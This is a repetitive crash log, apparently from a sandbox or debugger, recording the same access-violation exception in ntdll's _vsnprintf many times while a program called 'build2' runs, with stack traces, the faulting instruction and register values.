build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
